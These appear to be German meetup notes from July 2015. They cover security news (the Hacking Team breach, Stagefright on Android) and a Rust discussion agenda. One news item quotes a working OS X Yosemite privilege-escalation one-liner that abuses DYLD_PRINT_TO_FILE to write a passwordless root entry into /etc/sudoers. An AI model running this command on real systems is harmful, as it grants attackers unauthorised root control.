53 lines
2.3 KiB
Plaintext
53 lines
2.3 KiB
Plaintext
## Juli 2015
|
|
|
|
News:
|
|
|
|
- <http://www.heise.de/netze/meldung/Snowden-Appell-an-die-IETF-Schuetzt-die-Internetnutzer-2753289.html>
|
|
- <http://www.heise.de/newsticker/meldung/Neuer-Bitkom-Chef-haelt-Datensparsamkeit-fuer-veraltet-und-hinderlich-2753840.html>
|
|
- <http://www.gainesville.com/article/20150720/ARTICLES/150729990>
|
|
|
|
- Hacking Team hacked:
|
|
- mailaender "security firma"
|
|
- 400GB daten auf Wikileaks gelandet:
|
|
- Geschäftsberichte, Exceltabellen + 1mio emails
|
|
- deren Passwörter ("passw0rd")
|
|
- aber auch ZeroDays (Flash, Chrome, Windows!)
|
|
- Kaufen ZeroDays hauptsaechlich ein
|
|
- <http://www.heise.de/ct/ausgabe/2015-17-Die-Spionagesoftware-Firma-Hacking-Team-wurde-gehackt-2755600.html>
|
|
- <http://www.heise.de/security/meldung/Super-Spion-Android-Ueberwachungssoftware-von-Hacking-Team-nutzt-allerhand-schmutzige-Tricks-2759365.html>
|
|
- <http://www.heise.de/security/meldung/Hacking-Team-Wir-sind-das-Opfer-2763077.html>
|
|
- <https://www.grc.com/sn/sn-515.htm>
|
|
|
|
- Stagefright
|
|
<http://www.heise.de/security/meldung/Stagefright-Android-Smartphones-ueber-Kurznachrichten-angreifbar-2763764.html>
|
|
- Joshua Drake von Zimperium zLabs gegenüber Forbes erklärt,
|
|
- muss der Angreifer seinem Opfer in spe lediglich eine MMS- oder
|
|
Hangouts-Nachricht schicken, in der sich Exploit-Code befindet.
|
|
- Angriff ohne Spuren
|
|
- Smartphone als Wanze
|
|
- Android 2.2 bis 5.1 verwundbar
|
|
- Hersteller sind gefragt
|
|
- Full Disclosure auf der BlackHat
|
|
- Zumindest das Google-Referenzgerät Nexus 6 und das Blackphone sollen
|
|
bereits gegen einige der Schwachstellen gewappnet sein.
|
|
- Die Entwickler der alternativen Android-Distribution CyanogenMod
|
|
erklären, dass sie die Lücken bereits vor Wochen in CM 12 und der
|
|
Nightly Build von 12.1 geschlossen haben
|
|
- vor allem Android-Versionen, die älter als 4.1 sind. Neuere
|
|
Versionen mit Schutzfunktionen ausgestattet, die das Ausnutzen über
|
|
MMS erschweren
|
|
- Mac OS X Priviledge Escalation in 300 Zeichen
|
|
- echo 'echo "\$(whoami) ALL=(ALL) NOPASSWD:ALL" \>&3' \|
|
|
DYLD_PRINT_TO_FILE=/etc/sudoers newgrp; sudo -s
|
|
- <http://www.theregister.co.uk/2015/07/22/os_x_root_hole/>
|
|
- OS X Yosemite Mac using code that fits in a tweet. (El Capitan)
|
|
- Jeep
|
|
|
|
Thema: Rust
|
|
\* Fmt standards
|
|
\* Pkg registry
|
|
\* Coole Projekte?
|
|
|
|
<https://gist.github.com/hoodie/b175834afa68104aadbb> (WIP)
|
|
|